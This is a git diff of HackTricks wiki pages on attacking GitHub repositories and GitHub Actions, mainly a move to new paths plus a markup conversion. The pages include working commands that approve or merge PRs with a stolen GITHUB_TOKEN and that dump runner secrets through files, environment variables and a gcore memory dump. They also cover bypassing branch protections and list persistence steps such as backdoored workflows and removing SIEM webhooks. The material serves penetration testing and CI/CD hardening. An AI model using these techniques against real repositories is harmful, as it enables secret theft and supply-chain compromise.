-* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. +- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way. + - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ +- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. +- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. + - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** +- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. 
+- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. +- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. +- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. +- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). + - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. ## Bypass Environments Protections 
@@ -217,24 +201,24 @@ In case an environment can be **accessed from all the branches**, it's **isn't p Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. ```yaml - push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch +push: # Run it when a push is made to a branch + branches: + - current_branch_name #Use '**' to run when a push is made to any branch ``` Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. ## Persistence -* Generate **user token** -* Steal **github tokens** from **secrets** - * **Deletion** of workflow **results** and **branches** -* Give **more permissions to all the org** -* Create **webhooks** to exfiltrate information -* Invite **outside collaborators** -* **Remove** **webhooks** used by the **SIEM** -* Create/modify **Github Action** with a **backdoor** -* Find **vulnerable Github Action to command injection** via **secret** value modification +- Generate **user token** +- Steal **github tokens** from **secrets** + - **Deletion** of workflow **results** and **branches** +- Give **more permissions to all the org** +- Create **webhooks** to exfiltrate information +- Invite **outside collaborators** +- **Remove** **webhooks** used by the **SIEM** +- Create/modify **Github Action** with a **backdoor** +- Find **vulnerable Github Action to command injection** via **secret** value modification ### Imposter Commits - Backdoor via repo commits 
@@ -246,28 +230,15 @@ Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1eb name: example on: [push] jobs: - commit: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e - - shell: bash - run: | - echo 'hello world!' + commit: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e + - shell: bash + run: | + echo 'hello world!' ``` For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md similarity index 65% rename from pentesting-ci-cd/github-security/abusing-github-actions/README.md rename to src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index f6d755b44..a9f7633d1 100644 --- a/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -1,31 +1,18 @@ # Abusing Github Actions -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information In this page you will find: -* A **summary of all the impacts** of an attacker managing to access a Github Action -* Different ways to **get access to an action**: - * Having **permissions** to create the action - * Abusing **pull request** related triggers - * Abusing **other external access** techniques - * **Pivoting** from an already compromised repo -* Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) +- A **summary of all the impacts** of an attacker managing to access a Github Action +- Different ways to **get access to an action**: + - Having **permissions** to create the action + - Abusing **pull request** related triggers + - Abusing **other external access** techniques + - **Pivoting** from an already compromised repo +- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) ## Impacts Summary 
@@ -33,45 +20,46 @@ For an introduction about [**Github Actions check the basic information**](../ba If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: -* **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. -* **Compromise deployments** and other **artifacts**. - * If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. -* **Execute code in custom workers** to abuse computing power and pivot to other systems. -* **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. +- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. +- **Compromise deployments** and other **artifacts**. + - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. +- **Execute code in custom workers** to abuse computing power and pivot to other systems. +- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. -## GITHUB\_TOKEN +## GITHUB_TOKEN This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: -
+
This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) -{% hint style="warning" %} -Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. -{% endhint %} +> [!WARNING] +> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) +You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) Note that the token **expires after the job has completed**.\ These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` Some interesting things you can do with this token: -{% tabs %} -{% tab title="Merge PR" %} +{{#tabs }} +{{#tab name="Merge PR" }} + ```bash # Merge PR curl -X PUT \ https://api.github.com/repos///pulls//merge \ -H "Accept: application/vnd.github.v3+json" \ --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"commit_title":"commit_title"}' + --header "content-type: application/json" \ + -d "{\"commit_title\":\"commit_title\"}" ``` -{% endtab %} -{% tab title="Approve PR" %} +{{#endtab }} +{{#tab 
name="Approve PR" }} + ```bash # Approve a PR curl -X POST \ @@ -81,9 +69,10 @@ curl -X POST \ --header 'content-type: application/json' \ -d '{"event":"APPROVE"}' ``` -{% endtab %} -{% tab title="Create PR" %} +{{#endtab }} +{{#tab name="Create PR" }} + ```bash # Create a PR curl -X POST \ @@ -93,12 +82,12 @@ curl -X POST \ https://api.github.com/repos///pulls \ -d '{"head":"","base":"master", "title":"title"}' ``` -{% endtab %} -{% endtabs %} -{% hint style="danger" %} -Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. -{% endhint %} +{{#endtab }} +{{#endtabs }} + +> [!CAUTION] +> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
@@ -110,11 +99,11 @@ on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to a branch branches: - - '**' + - "**" push: # Run it when a push is made to a branch branches: - - '**' -jobs: + - "**" +jobs: List_env: runs-on: ubuntu-latest steps: @@ -138,11 +127,11 @@ on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to a branch branches: - - '**' + - "**" push: # Run it when a push is made to a branch branches: - - '**' -jobs: + - "**" +jobs: create_pull_request: runs-on: ubuntu-latest steps: @@ -157,15 +146,14 @@ jobs: It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: -
+
## Allowed Execution -{% hint style="info" %} -This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. - -If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). -{% endhint %} +> [!NOTE] +> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. +> +> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). ### Execution from Repo Creation @@ -186,29 +174,26 @@ on: push: # Run it when a push is made to a branch branches: - current_branch_name - # Use '**' instead of a branh name to trigger the action in all the cranches ``` -*** +--- ## Forked Execution -{% hint style="info" %} -There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. -{% endhint %} +> [!NOTE] +> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. ### `pull_request` The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: -
+
-{% hint style="info" %} -As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. - -**I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ -{% endhint %} +> [!NOTE] +> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. +> +> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): @@ -216,9 +201,8 @@ Moreover, by default **prevents write permissions** and **secrets access** to th An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. -{% hint style="danger" %} -**Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** -{% endhint %} +> [!CAUTION] +> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. 
@@ -235,7 +219,7 @@ An this one will have **access to secrets**. ### `workflow_run` -The [**workflow\_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. +The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: @@ -256,7 +240,7 @@ The second one consist on **passing** an **artifact** from the **untrusted** cod TODO -TODO: Check if when executed from a pull\_request the used/downloaded code if the one from the origin or from the forked PR +TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR ## Abusing Forked Execution @@ -268,9 +252,8 @@ In the case of **`pull_request`,** the workflow is going to be executed in the * In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. -{% hint style="danger" %} -However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): -{% endhint %} +> [!CAUTION] +> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
# INSECURE. Provided as an example only.
 on:
@@ -302,27 +285,26 @@ jobs:
 
 The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
 
-{% hint style="warning" %}
-A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
-{% endhint %}
+> [!WARNING]
+> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
 
 ### Context Script Injections 
 
 Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
 
-{% content-ref url="gh-actions-context-script-injections.md" %}
-[gh-actions-context-script-injections.md](gh-actions-context-script-injections.md)
-{% endcontent-ref %}
+{{#ref}}
+gh-actions-context-script-injections.md
+{{#endref}}
 
-### **GITHUB\_ENV Script Injection** 
+### **GITHUB_ENV Script Injection** 
 
 From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
 
-If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD\_PRELOAD** or **NODE\_OPTIONS**.
+If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
 
 For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
 
-
+
### Vulnerable Third Party Github Actions @@ -336,25 +318,25 @@ Example of vulnerable workflow: ```yaml on: - workflow_run: - workflows: ["some workflow"] - types: - - completed - + workflow_run: + workflows: ["some workflow"] + types: + - completed + jobs: - success: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v2 - - name: download artifact - uses: dawidd6/action-download-artifact - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: artifact - - run: python ./script.py - with: - name: artifact - path: ./script.py + success: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: download artifact + uses: dawidd6/action-download-artifact + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: artifact + - run: python ./script.py + with: + name: artifact + path: ./script.py ``` This could be attacked with this workflow: @@ -374,7 +356,7 @@ jobs: path: ./script.py ``` -*** +--- ## Other External Access 
@@ -382,37 +364,35 @@ jobs: If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted. -{% hint style="danger" %} -So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action. -{% endhint %} +> [!CAUTION] +> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action. If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) -*** +--- ## Repo Pivoting -{% hint style="info" %} -In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section). -{% endhint %} +> [!NOTE] +> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section). ### Cache Poisoning A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow. 
-{% content-ref url="gh-actions-cache-poisoning.md" %} -[gh-actions-cache-poisoning.md](gh-actions-cache-poisoning.md) -{% endcontent-ref %} +{{#ref}} +gh-actions-cache-poisoning.md +{{#endref}} ### Artifact Poisoning Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**: -{% content-ref url="gh-actions-artifact-poisoning.md" %} -[gh-actions-artifact-poisoning.md](gh-actions-artifact-poisoning.md) -{% endcontent-ref %} +{{#ref}} +gh-actions-artifact-poisoning.md +{{#endref}} -*** +--- ## Post Exploitation from an Action @@ -420,19 +400,19 @@ Workflows could use **artifacts from other workflows and even repos**, if an att Check the following pages: -{% content-ref url="../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md" %} -[aws-federation-abuse.md](../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) -{% endcontent-ref %} +{{#ref}} +../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md +{{#endref}} -{% content-ref url="../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md" %} -[gcp-federation-abuse.md](../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) -{% endcontent-ref %} +{{#ref}} +../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md +{{#endref}} ### Accessing secrets If you are injecting content into a script it's interesting to know how you can access secrets: -* If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**. +- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
@@ -448,7 +428,7 @@ on: push: # Run it when a push is made to a branch branches: - '**' -jobs: +jobs: List_env: runs-on: ubuntu-latest steps: @@ -473,11 +453,11 @@ on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to a branch branches: - - '**' + - "**" push: # Run it when a push is made to a branch branches: - - '**' -jobs: + - "**" +jobs: create_pull_request: runs-on: ubuntu-latest steps: @@ -490,21 +470,21 @@ jobs:
-* If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible. - * ```bash +- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible. + - ```bash cat /home/runner/work/_temp/* ``` -* For a JavaScript actions the secrets and sent through environment variables - * ```bash +- For a JavaScript actions the secrets and sent through environment variables + - ```bash ps axe | grep node ``` -* For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**: +- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**: - ```yaml - uses: fakeaction/publish@v3 - with: - key: ${{ secrets.PUBLISH_KEY }} - ``` + ```yaml + uses: fakeaction/publish@v3 + with: + key: ${{ secrets.PUBLISH_KEY }} + ``` ### Abusing Self-hosted runners @@ -514,12 +494,10 @@ The way to find which **Github Actions are being executed in non-github infrastr In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory: -{% code overflow="wrap" %} ```bash sudo apt-get install -y gdb sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')" ``` -{% endcode %} Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/). @@ -574,7 +552,9 @@ docker pull ghcr.io//: Then, the user could search for **leaked secrets in the Docker image layers:** -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %} +{{#ref}} +https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics +{{#endref}} ### Sensitive info in Github Actions logs 
@@ -586,30 +566,16 @@ Even if **Github** try to **detect secret values** in the actions logs and **avo An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github. -{% hint style="warning" %} -The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. -{% endhint %} +> [!WARNING] +> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. ## Tools The following tools are useful to find Github Action workflows and even find vulnerable ones: -* [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven) -* [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato) -* [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X) -* [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda) +- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven) +- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato) +- [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X) +- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
similarity index 100%
rename from pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
rename to src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
similarity index 100%
rename from pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
rename to src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
similarity index 100%
rename from pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
rename to src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
new file mode 100644
index 000000000..879983075
--- /dev/null
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -0,0 +1,56 @@
+# Accessible Deleted Data in Github
+
+{{#include ../../banners/hacktricks-training.md}}
+
+This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+
+## Accessing Deleted Fork Data
+
+1. You fork a public repository
+2. You commit code to your fork
+3. You delete your fork
+
+> [!CAUTION]
+> The data commited in the deleted fork is still accessible.
+
+## Accessing Deleted Repo Data
+
+1. You have a public repo on GitHub.
+2. A user forks your repo.
+3. You commit data after they fork it (and they never sync their fork with your updates).
+4. You delete the entire repo.
+
+> [!CAUTION]
+> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+
+## Accessing Private Repo Data
+
+1. You create a private repo that will eventually be made public.
+2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
+3. You make your “upstream” repository public and keep your fork private.
+
+> [!CAUTION]
+> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+
+## How to discover commits from deleted/hidden forks
+
+The same blog post propose 2 options:
+
+### Directly accessing the commit
+
+If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
+
+### Brute-forcing short SHA-1 values
+
+It's the same to access both of these:
+
+- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
+- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
+
+And the latest one use a short sha-1 that is bruteforceable.
+
+## References
+
+- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
similarity index 62%
rename from pentesting-ci-cd/github-security/basic-github-information.md
rename to src/pentesting-ci-cd/github-security/basic-github-information.md
index a4cabaef3..1fe92dd5c 100644
--- a/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -1,19 +1,6 @@
 # Basic Github Information
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 ## Basic Structure
@@ -29,58 +16,58 @@ And finally **repositories may have special protection mechanisms**.
 ### Enterprise Roles
-* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
+- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
 ### Organization Roles
 In an organisation users can have different roles:
-* **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-* **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-* **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-* **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-* **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
